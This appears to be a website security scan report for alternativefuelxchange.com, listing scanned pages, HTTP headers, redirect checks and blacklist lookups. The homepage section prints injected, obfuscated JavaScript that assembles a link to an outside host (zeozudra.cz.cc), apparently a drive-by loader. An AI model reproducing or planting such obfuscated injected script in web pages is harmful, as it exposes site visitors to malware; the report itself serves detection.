Scanned pages/files
Request | Server response | Status |
http://alternativefuelxchange.com/ | 200 OK Content-Length: 6602 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function lG(){};jJ="";lG.prototype = {eS : function() {function q(){};function wH(){};return '\u004a\u004a\u004a\u006f\u0049\u0034\u0050\u0077\u0068\u0074\u0074\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0066\u0061\u0075\u006c\u0074\u0067'.replace(/QQQQQQQQ/g, 'YYYYYYYY').slice(8, -1).replace(/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY/g, 'p://zeozudra.cz.cc Decoded script: function () { var bB = function () {return "bB";}; function hU() { } function nK() { } lT = ""; xP.z(); rT = "rT"; var gH = ""; this.qI = ""; var xO = "xO"; var dU = ""; this.vZ = false; wP = ""; } /*** called setTimeout with function () { var bB = function () {return "bB";}; function hU() { } function nK() { } lT = ""; xP.z(); rT = "rT"; var gH = ""; this.qI = ""; var xO = "xO"; var dU = ""; this.vZ = false; wP = ""; }, 317 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://alternativefuelxchange.com/trading%20screen.htm | 200 OK Content-Length: 17368 Content-Type: text/html | clean |
http://alternativefuelxchange.com/test404page.js | 404 Not Found Content-Length: 436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alternativefuelxchange.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 00:00:07 GMT
Accept-Ranges: bytes
ETag: "19ca-496fa9a896111"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6602
Content-Type: text/html
Last-Modified: Thu, 09 Dec 2010 13:56:25 GMT
...6602 bytes of data.
GET / HTTP/1.1
Host: alternativefuelxchange.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 00:00:07 GMT
Accept-Ranges: bytes
ETag: "19ca-496fa9a896111"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6602
Content-Type: text/html
Last-Modified: Thu, 09 Dec 2010 13:56:25 GMT
...6602 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alternativefuelxchange.com
Referer: http://www.google.com/search?q=alternativefuelxchange.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alternativefuelxchange.com
Referer: http://www.google.com/search?q=alternativefuelxchange.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alternativefuelxchange.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alternativefuelxchange.com/
Result: alternativefuelxchange.com is not infected or malware details are not published yet.
Result: alternativefuelxchange.com is not infected or malware details are not published yet.